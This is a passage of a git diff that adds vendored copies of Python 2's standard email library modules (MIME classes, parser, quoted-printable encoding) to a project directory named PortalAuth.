"""Return a list containing the charset(s) used in this message.
|
||||
|
||||
The returned list of items describes the Content-Type headers'
|
||||
charset parameter for this message and all the subparts in its
|
||||
payload.
|
||||
|
||||
Each item will either be a string (the value of the charset parameter
|
||||
in the Content-Type header of that part) or the value of the
|
||||
'failobj' parameter (defaults to None), if the part does not have a
|
||||
main MIME type of "text", or the charset is not defined.
|
||||
|
||||
The list will contain one string for each part of the message, plus
|
||||
one for the container message (i.e. self), so that a non-multipart
|
||||
message will still return a list of length 1.
|
||||
"""
|
||||
return [part.get_content_charset(failobj) for part in self.walk()]
|
||||
|
||||
# I.e. def walk(self): ...
|
||||
from email.iterators import walk
|
||||
BIN
PortalAuth/includes/scripts/libs/email/message.pyc
Executable file
BIN
PortalAuth/includes/scripts/libs/email/message.pyc
Executable file
Binary file not shown.
0
PortalAuth/includes/scripts/libs/email/mime/__init__.py
Executable file
0
PortalAuth/includes/scripts/libs/email/mime/__init__.py
Executable file
BIN
PortalAuth/includes/scripts/libs/email/mime/__init__.pyc
Executable file
BIN
PortalAuth/includes/scripts/libs/email/mime/__init__.pyc
Executable file
Binary file not shown.
36
PortalAuth/includes/scripts/libs/email/mime/application.py
Executable file
36
PortalAuth/includes/scripts/libs/email/mime/application.py
Executable file
@@ -0,0 +1,36 @@
|
||||
# Copyright (C) 2001-2006 Python Software Foundation
|
||||
# Author: Keith Dart
|
||||
# Contact: email-sig@python.org
|
||||
|
||||
"""Class representing application/* type MIME documents."""
|
||||
|
||||
__all__ = ["MIMEApplication"]
|
||||
|
||||
from email import encoders
|
||||
from email.mime.nonmultipart import MIMENonMultipart
|
||||
|
||||
|
||||
class MIMEApplication(MIMENonMultipart):
|
||||
"""Class for generating application/* MIME documents."""
|
||||
|
||||
def __init__(self, _data, _subtype='octet-stream',
|
||||
_encoder=encoders.encode_base64, **_params):
|
||||
"""Create an application/* type MIME document.
|
||||
|
||||
_data is a string containing the raw application data.
|
||||
|
||||
_subtype is the MIME content type subtype, defaulting to
|
||||
'octet-stream'.
|
||||
|
||||
_encoder is a function which will perform the actual encoding for
|
||||
transport of the application data, defaulting to base64 encoding.
|
||||
|
||||
Any additional keyword arguments are passed to the base class
|
||||
constructor, which turns them into parameters on the Content-Type
|
||||
header.
|
||||
"""
|
||||
if _subtype is None:
|
||||
raise TypeError('Invalid application MIME subtype')
|
||||
MIMENonMultipart.__init__(self, 'application', _subtype, **_params)
|
||||
self.set_payload(_data)
|
||||
_encoder(self)
|
||||
73
PortalAuth/includes/scripts/libs/email/mime/audio.py
Executable file
73
PortalAuth/includes/scripts/libs/email/mime/audio.py
Executable file
@@ -0,0 +1,73 @@
|
||||
# Copyright (C) 2001-2006 Python Software Foundation
|
||||
# Author: Anthony Baxter
|
||||
# Contact: email-sig@python.org
|
||||
|
||||
"""Class representing audio/* type MIME documents."""
|
||||
|
||||
__all__ = ['MIMEAudio']
|
||||
|
||||
import sndhdr
|
||||
|
||||
from cStringIO import StringIO
|
||||
from email import encoders
|
||||
from email.mime.nonmultipart import MIMENonMultipart
|
||||
|
||||
|
||||
|
||||
_sndhdr_MIMEmap = {'au' : 'basic',
|
||||
'wav' :'x-wav',
|
||||
'aiff':'x-aiff',
|
||||
'aifc':'x-aiff',
|
||||
}
|
||||
|
||||
# There are others in sndhdr that don't have MIME types. :(
|
||||
# Additional ones to be added to sndhdr? midi, mp3, realaudio, wma??
|
||||
def _whatsnd(data):
|
||||
"""Try to identify a sound file type.
|
||||
|
||||
sndhdr.what() has a pretty cruddy interface, unfortunately. This is why
|
||||
we re-do it here. It would be easier to reverse engineer the Unix 'file'
|
||||
command and use the standard 'magic' file, as shipped with a modern Unix.
|
||||
"""
|
||||
hdr = data[:512]
|
||||
fakefile = StringIO(hdr)
|
||||
for testfn in sndhdr.tests:
|
||||
res = testfn(hdr, fakefile)
|
||||
if res is not None:
|
||||
return _sndhdr_MIMEmap.get(res[0])
|
||||
return None
|
||||
|
||||
|
||||
|
||||
class MIMEAudio(MIMENonMultipart):
|
||||
"""Class for generating audio/* MIME documents."""
|
||||
|
||||
def __init__(self, _audiodata, _subtype=None,
|
||||
_encoder=encoders.encode_base64, **_params):
|
||||
"""Create an audio/* type MIME document.
|
||||
|
||||
_audiodata is a string containing the raw audio data. If this data
|
||||
can be decoded by the standard Python `sndhdr' module, then the
|
||||
subtype will be automatically included in the Content-Type header.
|
||||
Otherwise, you can specify the specific audio subtype via the
|
||||
_subtype parameter. If _subtype is not given, and no subtype can be
|
||||
guessed, a TypeError is raised.
|
||||
|
||||
_encoder is a function which will perform the actual encoding for
|
||||
transport of the image data. It takes one argument, which is this
|
||||
Image instance. It should use get_payload() and set_payload() to
|
||||
change the payload to the encoded form. It should also add any
|
||||
Content-Transfer-Encoding or other headers to the message as
|
||||
necessary. The default encoding is Base64.
|
||||
|
||||
Any additional keyword arguments are passed to the base class
|
||||
constructor, which turns them into parameters on the Content-Type
|
||||
header.
|
||||
"""
|
||||
if _subtype is None:
|
||||
_subtype = _whatsnd(_audiodata)
|
||||
if _subtype is None:
|
||||
raise TypeError('Could not find audio MIME subtype')
|
||||
MIMENonMultipart.__init__(self, 'audio', _subtype, **_params)
|
||||
self.set_payload(_audiodata)
|
||||
_encoder(self)
|
||||
26
PortalAuth/includes/scripts/libs/email/mime/base.py
Executable file
26
PortalAuth/includes/scripts/libs/email/mime/base.py
Executable file
@@ -0,0 +1,26 @@
|
||||
# Copyright (C) 2001-2006 Python Software Foundation
|
||||
# Author: Barry Warsaw
|
||||
# Contact: email-sig@python.org
|
||||
|
||||
"""Base class for MIME specializations."""
|
||||
|
||||
__all__ = ['MIMEBase']
|
||||
|
||||
from email import message
|
||||
|
||||
|
||||
|
||||
class MIMEBase(message.Message):
|
||||
"""Base class for MIME specializations."""
|
||||
|
||||
def __init__(self, _maintype, _subtype, **_params):
|
||||
"""This constructor adds a Content-Type: and a MIME-Version: header.
|
||||
|
||||
The Content-Type: header is taken from the _maintype and _subtype
|
||||
arguments. Additional parameters for this header are taken from the
|
||||
keyword arguments.
|
||||
"""
|
||||
message.Message.__init__(self)
|
||||
ctype = '%s/%s' % (_maintype, _subtype)
|
||||
self.add_header('Content-Type', ctype, **_params)
|
||||
self['MIME-Version'] = '1.0'
|
||||
46
PortalAuth/includes/scripts/libs/email/mime/image.py
Executable file
46
PortalAuth/includes/scripts/libs/email/mime/image.py
Executable file
@@ -0,0 +1,46 @@
|
||||
# Copyright (C) 2001-2006 Python Software Foundation
|
||||
# Author: Barry Warsaw
|
||||
# Contact: email-sig@python.org
|
||||
|
||||
"""Class representing image/* type MIME documents."""
|
||||
|
||||
__all__ = ['MIMEImage']
|
||||
|
||||
import imghdr
|
||||
|
||||
from email import encoders
|
||||
from email.mime.nonmultipart import MIMENonMultipart
|
||||
|
||||
|
||||
|
||||
class MIMEImage(MIMENonMultipart):
|
||||
"""Class for generating image/* type MIME documents."""
|
||||
|
||||
def __init__(self, _imagedata, _subtype=None,
|
||||
_encoder=encoders.encode_base64, **_params):
|
||||
"""Create an image/* type MIME document.
|
||||
|
||||
_imagedata is a string containing the raw image data. If this data
|
||||
can be decoded by the standard Python `imghdr' module, then the
|
||||
subtype will be automatically included in the Content-Type header.
|
||||
Otherwise, you can specify the specific image subtype via the _subtype
|
||||
parameter.
|
||||
|
||||
_encoder is a function which will perform the actual encoding for
|
||||
transport of the image data. It takes one argument, which is this
|
||||
Image instance. It should use get_payload() and set_payload() to
|
||||
change the payload to the encoded form. It should also add any
|
||||
Content-Transfer-Encoding or other headers to the message as
|
||||
necessary. The default encoding is Base64.
|
||||
|
||||
Any additional keyword arguments are passed to the base class
|
||||
constructor, which turns them into parameters on the Content-Type
|
||||
header.
|
||||
"""
|
||||
if _subtype is None:
|
||||
_subtype = imghdr.what(None, _imagedata)
|
||||
if _subtype is None:
|
||||
raise TypeError('Could not guess image MIME subtype')
|
||||
MIMENonMultipart.__init__(self, 'image', _subtype, **_params)
|
||||
self.set_payload(_imagedata)
|
||||
_encoder(self)
|
||||
34
PortalAuth/includes/scripts/libs/email/mime/message.py
Executable file
34
PortalAuth/includes/scripts/libs/email/mime/message.py
Executable file
@@ -0,0 +1,34 @@
|
||||
# Copyright (C) 2001-2006 Python Software Foundation
|
||||
# Author: Barry Warsaw
|
||||
# Contact: email-sig@python.org
|
||||
|
||||
"""Class representing message/* MIME documents."""
|
||||
|
||||
__all__ = ['MIMEMessage']
|
||||
|
||||
from email import message
|
||||
from email.mime.nonmultipart import MIMENonMultipart
|
||||
|
||||
|
||||
|
||||
class MIMEMessage(MIMENonMultipart):
|
||||
"""Class representing message/* MIME documents."""
|
||||
|
||||
def __init__(self, _msg, _subtype='rfc822'):
|
||||
"""Create a message/* type MIME document.
|
||||
|
||||
_msg is a message object and must be an instance of Message, or a
|
||||
derived class of Message, otherwise a TypeError is raised.
|
||||
|
||||
Optional _subtype defines the subtype of the contained message. The
|
||||
default is "rfc822" (this is defined by the MIME standard, even though
|
||||
the term "rfc822" is technically outdated by RFC 2822).
|
||||
"""
|
||||
MIMENonMultipart.__init__(self, 'message', _subtype)
|
||||
if not isinstance(_msg, message.Message):
|
||||
raise TypeError('Argument is not an instance of Message')
|
||||
# It's convenient to use this base class method. We need to do it
|
||||
# this way or we'll get an exception
|
||||
message.Message.attach(self, _msg)
|
||||
# And be sure our default type is set correctly
|
||||
self.set_default_type('message/rfc822')
|
||||
47
PortalAuth/includes/scripts/libs/email/mime/multipart.py
Executable file
47
PortalAuth/includes/scripts/libs/email/mime/multipart.py
Executable file
@@ -0,0 +1,47 @@
|
||||
# Copyright (C) 2002-2006 Python Software Foundation
|
||||
# Author: Barry Warsaw
|
||||
# Contact: email-sig@python.org
|
||||
|
||||
"""Base class for MIME multipart/* type messages."""
|
||||
|
||||
__all__ = ['MIMEMultipart']
|
||||
|
||||
from email.mime.base import MIMEBase
|
||||
|
||||
|
||||
|
||||
class MIMEMultipart(MIMEBase):
|
||||
"""Base class for MIME multipart/* type messages."""
|
||||
|
||||
def __init__(self, _subtype='mixed', boundary=None, _subparts=None,
|
||||
**_params):
|
||||
"""Creates a multipart/* type message.
|
||||
|
||||
By default, creates a multipart/mixed message, with proper
|
||||
Content-Type and MIME-Version headers.
|
||||
|
||||
_subtype is the subtype of the multipart content type, defaulting to
|
||||
`mixed'.
|
||||
|
||||
boundary is the multipart boundary string. By default it is
|
||||
calculated as needed.
|
||||
|
||||
_subparts is a sequence of initial subparts for the payload. It
|
||||
must be an iterable object, such as a list. You can always
|
||||
attach new subparts to the message by using the attach() method.
|
||||
|
||||
Additional parameters for the Content-Type header are taken from the
|
||||
keyword arguments (or passed into the _params argument).
|
||||
"""
|
||||
MIMEBase.__init__(self, 'multipart', _subtype, **_params)
|
||||
|
||||
# Initialise _payload to an empty list as the Message superclass's
|
||||
# implementation of is_multipart assumes that _payload is a list for
|
||||
# multipart messages.
|
||||
self._payload = []
|
||||
|
||||
if _subparts:
|
||||
for p in _subparts:
|
||||
self.attach(p)
|
||||
if boundary:
|
||||
self.set_boundary(boundary)
|
||||
22
PortalAuth/includes/scripts/libs/email/mime/nonmultipart.py
Executable file
22
PortalAuth/includes/scripts/libs/email/mime/nonmultipart.py
Executable file
@@ -0,0 +1,22 @@
|
||||
# Copyright (C) 2002-2006 Python Software Foundation
|
||||
# Author: Barry Warsaw
|
||||
# Contact: email-sig@python.org
|
||||
|
||||
"""Base class for MIME type messages that are not multipart."""
|
||||
|
||||
__all__ = ['MIMENonMultipart']
|
||||
|
||||
from email import errors
|
||||
from email.mime.base import MIMEBase
|
||||
|
||||
|
||||
|
||||
class MIMENonMultipart(MIMEBase):
|
||||
"""Base class for MIME multipart/* type messages."""
|
||||
|
||||
def attach(self, payload):
|
||||
# The public API prohibits attaching multiple subparts to MIMEBase
|
||||
# derived subtypes since none of them are, by definition, of content
|
||||
# type multipart/*
|
||||
raise errors.MultipartConversionError(
|
||||
'Cannot attach additional subparts to non-multipart/*')
|
||||
30
PortalAuth/includes/scripts/libs/email/mime/text.py
Executable file
30
PortalAuth/includes/scripts/libs/email/mime/text.py
Executable file
@@ -0,0 +1,30 @@
|
||||
# Copyright (C) 2001-2006 Python Software Foundation
|
||||
# Author: Barry Warsaw
|
||||
# Contact: email-sig@python.org
|
||||
|
||||
"""Class representing text/* type MIME documents."""
|
||||
|
||||
__all__ = ['MIMEText']
|
||||
|
||||
from email.encoders import encode_7or8bit
|
||||
from email.mime.nonmultipart import MIMENonMultipart
|
||||
|
||||
|
||||
|
||||
class MIMEText(MIMENonMultipart):
|
||||
"""Class for generating text/* type MIME documents."""
|
||||
|
||||
def __init__(self, _text, _subtype='plain', _charset='us-ascii'):
|
||||
"""Create a text/* type MIME document.
|
||||
|
||||
_text is the string for this message object.
|
||||
|
||||
_subtype is the MIME sub content type, defaulting to "plain".
|
||||
|
||||
_charset is the character set parameter added to the Content-Type
|
||||
header. This defaults to "us-ascii". Note that as a side-effect, the
|
||||
Content-Transfer-Encoding header will also be set.
|
||||
"""
|
||||
MIMENonMultipart.__init__(self, 'text', _subtype,
|
||||
**{'charset': _charset})
|
||||
self.set_payload(_text, _charset)
|
||||
91
PortalAuth/includes/scripts/libs/email/parser.py
Executable file
91
PortalAuth/includes/scripts/libs/email/parser.py
Executable file
@@ -0,0 +1,91 @@
|
||||
# Copyright (C) 2001-2006 Python Software Foundation
|
||||
# Author: Barry Warsaw, Thomas Wouters, Anthony Baxter
|
||||
# Contact: email-sig@python.org
|
||||
|
||||
"""A parser of RFC 2822 and MIME email messages."""
|
||||
|
||||
__all__ = ['Parser', 'HeaderParser']
|
||||
|
||||
import warnings
|
||||
from cStringIO import StringIO
|
||||
|
||||
from email.feedparser import FeedParser
|
||||
from email.message import Message
|
||||
|
||||
|
||||
|
||||
class Parser:
|
||||
def __init__(self, *args, **kws):
|
||||
"""Parser of RFC 2822 and MIME email messages.
|
||||
|
||||
Creates an in-memory object tree representing the email message, which
|
||||
can then be manipulated and turned over to a Generator to return the
|
||||
textual representation of the message.
|
||||
|
||||
The string must be formatted as a block of RFC 2822 headers and header
|
||||
continuation lines, optionally preceeded by a `Unix-from' header. The
|
||||
header block is terminated either by the end of the string or by a
|
||||
blank line.
|
||||
|
||||
_class is the class to instantiate for new message objects when they
|
||||
must be created. This class must have a constructor that can take
|
||||
zero arguments. Default is Message.Message.
|
||||
"""
|
||||
if len(args) >= 1:
|
||||
if '_class' in kws:
|
||||
raise TypeError("Multiple values for keyword arg '_class'")
|
||||
kws['_class'] = args[0]
|
||||
if len(args) == 2:
|
||||
if 'strict' in kws:
|
||||
raise TypeError("Multiple values for keyword arg 'strict'")
|
||||
kws['strict'] = args[1]
|
||||
if len(args) > 2:
|
||||
raise TypeError('Too many arguments')
|
||||
if '_class' in kws:
|
||||
self._class = kws['_class']
|
||||
del kws['_class']
|
||||
else:
|
||||
self._class = Message
|
||||
if 'strict' in kws:
|
||||
warnings.warn("'strict' argument is deprecated (and ignored)",
|
||||
DeprecationWarning, 2)
|
||||
del kws['strict']
|
||||
if kws:
|
||||
raise TypeError('Unexpected keyword arguments')
|
||||
|
||||
def parse(self, fp, headersonly=False):
|
||||
"""Create a message structure from the data in a file.
|
||||
|
||||
Reads all the data from the file and returns the root of the message
|
||||
structure. Optional headersonly is a flag specifying whether to stop
|
||||
parsing after reading the headers or not. The default is False,
|
||||
meaning it parses the entire contents of the file.
|
||||
"""
|
||||
feedparser = FeedParser(self._class)
|
||||
if headersonly:
|
||||
feedparser._set_headersonly()
|
||||
while True:
|
||||
data = fp.read(8192)
|
||||
if not data:
|
||||
break
|
||||
feedparser.feed(data)
|
||||
return feedparser.close()
|
||||
|
||||
def parsestr(self, text, headersonly=False):
|
||||
"""Create a message structure from a string.
|
||||
|
||||
Returns the root of the message structure. Optional headersonly is a
|
||||
flag specifying whether to stop parsing after reading the headers or
|
||||
not. The default is False, meaning it parses the entire contents of
|
||||
the file.
|
||||
"""
|
||||
return self.parse(StringIO(text), headersonly=headersonly)
|
||||
|
||||
|
||||
|
||||
class HeaderParser(Parser):
|
||||
def parse(self, fp, headersonly=True):
|
||||
return Parser.parse(self, fp, True)
|
||||
|
||||
def parsestr(self, text, headersonly=True):
|
||||
return Parser.parsestr(self, text, True)
|
||||
BIN
PortalAuth/includes/scripts/libs/email/parser.pyc
Executable file
BIN
PortalAuth/includes/scripts/libs/email/parser.pyc
Executable file
Binary file not shown.
336
PortalAuth/includes/scripts/libs/email/quoprimime.py
Executable file
336
PortalAuth/includes/scripts/libs/email/quoprimime.py
Executable file
@@ -0,0 +1,336 @@
|
||||
# Copyright (C) 2001-2006 Python Software Foundation
|
||||
# Author: Ben Gertzfield
|
||||
# Contact: email-sig@python.org
|
||||
|
||||
"""Quoted-printable content transfer encoding per RFCs 2045-2047.
|
||||
|
||||
This module handles the content transfer encoding method defined in RFC 2045
|
||||
to encode US ASCII-like 8-bit data called `quoted-printable'. It is used to
|
||||
safely encode text that is in a character set similar to the 7-bit US ASCII
|
||||
character set, but that includes some 8-bit characters that are normally not
|
||||
allowed in email bodies or headers.
|
||||
|
||||
Quoted-printable is very space-inefficient for encoding binary files; use the
|
||||
email.base64mime module for that instead.
|
||||
|
||||
This module provides an interface to encode and decode both headers and bodies
|
||||
with quoted-printable encoding.
|
||||
|
||||
RFC 2045 defines a method for including character set information in an
|
||||
`encoded-word' in a header. This method is commonly used for 8-bit real names
|
||||
in To:/From:/Cc: etc. fields, as well as Subject: lines.
|
||||
|
||||
This module does not do the line wrapping or end-of-line character
|
||||
conversion necessary for proper internationalized headers; it only
|
||||
does dumb encoding and decoding. To deal with the various line
|
||||
wrapping issues, use the email.header module.
|
||||
"""
|
||||
|
||||
__all__ = [
|
||||
'body_decode',
|
||||
'body_encode',
|
||||
'body_quopri_check',
|
||||
'body_quopri_len',
|
||||
'decode',
|
||||
'decodestring',
|
||||
'encode',
|
||||
'encodestring',
|
||||
'header_decode',
|
||||
'header_encode',
|
||||
'header_quopri_check',
|
||||
'header_quopri_len',
|
||||
'quote',
|
||||
'unquote',
|
||||
]
|
||||
|
||||
import re
|
||||
|
||||
from string import hexdigits
|
||||
from email.utils import fix_eols
|
||||
|
||||
CRLF = '\r\n'
|
||||
NL = '\n'
|
||||
|
||||
# See also Charset.py
|
||||
MISC_LEN = 7
|
||||
|
||||
hqre = re.compile(r'[^-a-zA-Z0-9!*+/ ]')
|
||||
bqre = re.compile(r'[^ !-<>-~\t]')
|
||||
|
||||
|
||||
|
||||
# Helpers
|
||||
def header_quopri_check(c):
|
||||
"""Return True if the character should be escaped with header quopri."""
|
||||
return bool(hqre.match(c))
|
||||
|
||||
|
||||
def body_quopri_check(c):
|
||||
"""Return True if the character should be escaped with body quopri."""
|
||||
return bool(bqre.match(c))
|
||||
|
||||
|
||||
def header_quopri_len(s):
|
||||
"""Return the length of str when it is encoded with header quopri."""
|
||||
count = 0
|
||||
for c in s:
|
||||
if hqre.match(c):
|
||||
count += 3
|
||||
else:
|
||||
count += 1
|
||||
return count
|
||||
|
||||
|
||||
def body_quopri_len(str):
|
||||
"""Return the length of str when it is encoded with body quopri."""
|
||||
count = 0
|
||||
for c in str:
|
||||
if bqre.match(c):
|
||||
count += 3
|
||||
else:
|
||||
count += 1
|
||||
return count
|
||||
|
||||
|
||||
def _max_append(L, s, maxlen, extra=''):
|
||||
if not L:
|
||||
L.append(s.lstrip())
|
||||
elif len(L[-1]) + len(s) <= maxlen:
|
||||
L[-1] += extra + s
|
||||
else:
|
||||
L.append(s.lstrip())
|
||||
|
||||
|
||||
def unquote(s):
|
||||
"""Turn a string in the form =AB to the ASCII character with value 0xab"""
|
||||
return chr(int(s[1:3], 16))
|
||||
|
||||
|
||||
def quote(c):
|
||||
return "=%02X" % ord(c)
|
||||
|
||||
|
||||
|
||||
def header_encode(header, charset="iso-8859-1", keep_eols=False,
|
||||
maxlinelen=76, eol=NL):
|
||||
"""Encode a single header line with quoted-printable (like) encoding.
|
||||
|
||||
Defined in RFC 2045, this `Q' encoding is similar to quoted-printable, but
|
||||
used specifically for email header fields to allow charsets with mostly 7
|
||||
bit characters (and some 8 bit) to remain more or less readable in non-RFC
|
||||
2045 aware mail clients.
|
||||
|
||||
charset names the character set to use to encode the header. It defaults
|
||||
to iso-8859-1.
|
||||
|
||||
The resulting string will be in the form:
|
||||
|
||||
"=?charset?q?I_f=E2rt_in_your_g=E8n=E8ral_dire=E7tion?\\n
|
||||
=?charset?q?Silly_=C8nglish_Kn=EEghts?="
|
||||
|
||||
with each line wrapped safely at, at most, maxlinelen characters (defaults
|
||||
to 76 characters). If maxlinelen is None, the entire string is encoded in
|
||||
one chunk with no splitting.
|
||||
|
||||
End-of-line characters (\\r, \\n, \\r\\n) will be automatically converted
|
||||
to the canonical email line separator \\r\\n unless the keep_eols
|
||||
parameter is True (the default is False).
|
||||
|
||||
Each line of the header will be terminated in the value of eol, which
|
||||
defaults to "\\n". Set this to "\\r\\n" if you are using the result of
|
||||
this function directly in email.
|
||||
"""
|
||||
# Return empty headers unchanged
|
||||
if not header:
|
||||
return header
|
||||
|
||||
if not keep_eols:
|
||||
header = fix_eols(header)
|
||||
|
||||
# Quopri encode each line, in encoded chunks no greater than maxlinelen in
|
||||
# length, after the RFC chrome is added in.
|
||||
quoted = []
|
||||
if maxlinelen is None:
|
||||
# An obnoxiously large number that's good enough
|
||||
max_encoded = 100000
|
||||
else:
|
||||
max_encoded = maxlinelen - len(charset) - MISC_LEN - 1
|
||||
|
||||
for c in header:
|
||||
# Space may be represented as _ instead of =20 for readability
|
||||
if c == ' ':
|
||||
_max_append(quoted, '_', max_encoded)
|
||||
# These characters can be included verbatim
|
||||
elif not hqre.match(c):
|
||||
_max_append(quoted, c, max_encoded)
|
||||
# Otherwise, replace with hex value like =E2
|
||||
else:
|
||||
_max_append(quoted, "=%02X" % ord(c), max_encoded)
|
||||
|
||||
# Now add the RFC chrome to each encoded chunk and glue the chunks
|
||||
# together. BAW: should we be able to specify the leading whitespace in
|
||||
# the joiner?
|
||||
joiner = eol + ' '
|
||||
return joiner.join(['=?%s?q?%s?=' % (charset, line) for line in quoted])
|
||||
|
||||
|
||||
|
||||
def encode(body, binary=False, maxlinelen=76, eol=NL):
|
||||
"""Encode with quoted-printable, wrapping at maxlinelen characters.
|
||||
|
||||
If binary is False (the default), end-of-line characters will be converted
|
||||
to the canonical email end-of-line sequence \\r\\n. Otherwise they will
|
||||
be left verbatim.
|
||||
|
||||
Each line of encoded text will end with eol, which defaults to "\\n". Set
|
||||
this to "\\r\\n" if you will be using the result of this function directly
|
||||
in an email.
|
||||
|
||||
Each line will be wrapped at, at most, maxlinelen characters (defaults to
|
||||
76 characters). Long lines will have the `soft linefeed' quoted-printable
|
||||
character "=" appended to them, so the decoded text will be identical to
|
||||
the original text.
|
||||
"""
|
||||
if not body:
|
||||
return body
|
||||
|
||||
if not binary:
|
||||
body = fix_eols(body)
|
||||
|
||||
# BAW: We're accumulating the body text by string concatenation. That
|
||||
# can't be very efficient, but I don't have time now to rewrite it. It
|
||||
# just feels like this algorithm could be more efficient.
|
||||
encoded_body = ''
|
||||
lineno = -1
|
||||
# Preserve line endings here so we can check later to see an eol needs to
|
||||
# be added to the output later.
|
||||
lines = body.splitlines(1)
|
||||
for line in lines:
|
||||
# But strip off line-endings for processing this line.
|
||||
if line.endswith(CRLF):
|
||||
line = line[:-2]
|
||||
elif line[-1] in CRLF:
|
||||
line = line[:-1]
|
||||
|
||||
lineno += 1
|
||||
encoded_line = ''
|
||||
prev = None
|
||||
linelen = len(line)
|
||||
# Now we need to examine every character to see if it needs to be
|
||||
# quopri encoded. BAW: again, string concatenation is inefficient.
|
||||
for j in range(linelen):
|
||||
c = line[j]
|
||||
prev = c
|
||||
if bqre.match(c):
|
||||
c = quote(c)
|
||||
elif j+1 == linelen:
|
||||
# Check for whitespace at end of line; special case
|
||||
if c not in ' \t':
|
||||
encoded_line += c
|
||||
prev = c
|
||||
continue
|
||||
# Check to see to see if the line has reached its maximum length
|
||||
if len(encoded_line) + len(c) >= maxlinelen:
|
||||
encoded_body += encoded_line + '=' + eol
|
||||
encoded_line = ''
|
||||
encoded_line += c
|
||||
# Now at end of line..
|
||||
if prev and prev in ' \t':
|
||||
# Special case for whitespace at end of file
|
||||
if lineno + 1 == len(lines):
|
||||
prev = quote(prev)
|
||||
if len(encoded_line) + len(prev) > maxlinelen:
|
||||
encoded_body += encoded_line + '=' + eol + prev
|
||||
else:
|
||||
encoded_body += encoded_line + prev
|
||||
# Just normal whitespace at end of line
|
||||
else:
|
||||
encoded_body += encoded_line + prev + '=' + eol
|
||||
encoded_line = ''
|
||||
# Now look at the line we just finished and it has a line ending, we
|
||||
# need to add eol to the end of the line.
|
||||
if lines[lineno].endswith(CRLF) or lines[lineno][-1] in CRLF:
|
||||
encoded_body += encoded_line + eol
|
||||
else:
|
||||
encoded_body += encoded_line
|
||||
encoded_line = ''
|
||||
return encoded_body
|
||||
|
||||
|
||||
# For convenience and backwards compatibility w/ standard base64 module
|
||||
body_encode = encode
|
||||
encodestring = encode
|
||||
|
||||
|
||||
|
||||
# BAW: I'm not sure if the intent was for the signature of this function to be
|
||||
# the same as base64MIME.decode() or not...
|
||||
def decode(encoded, eol=NL):
|
||||
"""Decode a quoted-printable string.
|
||||
|
||||
Lines are separated with eol, which defaults to \\n.
|
||||
"""
|
||||
if not encoded:
|
||||
return encoded
|
||||
# BAW: see comment in encode() above. Again, we're building up the
|
||||
# decoded string with string concatenation, which could be done much more
|
||||
# efficiently.
|
||||
decoded = ''
|
||||
|
||||
for line in encoded.splitlines():
|
||||
line = line.rstrip()
|
||||
if not line:
|
||||
decoded += eol
|
||||
continue
|
||||
|
||||
i = 0
|
||||
n = len(line)
|
||||
while i < n:
|
||||
c = line[i]
|
||||
if c != '=':
|
||||
decoded += c
|
||||
i += 1
|
||||
# Otherwise, c == "=". Are we at the end of the line? If so, add
|
||||
# a soft line break.
|
||||
elif i+1 == n:
|
||||
i += 1
|
||||
continue
|
||||
# Decode if in form =AB
|
||||
elif i+2 < n and line[i+1] in hexdigits and line[i+2] in hexdigits:
|
||||
decoded += unquote(line[i:i+3])
|
||||
i += 3
|
||||
# Otherwise, not in form =AB, pass literally
|
||||
else:
|
||||
decoded += c
|
||||
i += 1
|
||||
|
||||
if i == n:
|
||||
decoded += eol
|
||||
# Special case if original string did not end with eol
|
||||
if not encoded.endswith(eol) and decoded.endswith(eol):
|
||||
decoded = decoded[:-1]
|
||||
return decoded
|
||||
|
||||
|
||||
# For convenience and backwards compatibility w/ standard base64 module
|
||||
body_decode = decode
|
||||
decodestring = decode
|
||||
|
||||
|
||||
|
||||
def _unquote_match(match):
|
||||
"""Turn a match in the form =AB to the ASCII character with value 0xab"""
|
||||
s = match.group(0)
|
||||
return unquote(s)
|
||||
|
||||
|
||||
# Header decoding is done a bit differently
|
||||
def header_decode(s):
|
||||
"""Decode a string encoded with RFC 2045 MIME header `Q' encoding.
|
||||
|
||||
This function does not parse a full MIME header value encoded with
|
||||
quoted-printable (like =?iso-8895-1?q?Hello_World?=) -- please use
|
||||
the high level email.header class for that functionality.
|
||||
"""
|
||||
s = s.replace('_', ' ')
|
||||
return re.sub(r'=[a-fA-F0-9]{2}', _unquote_match, s)
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user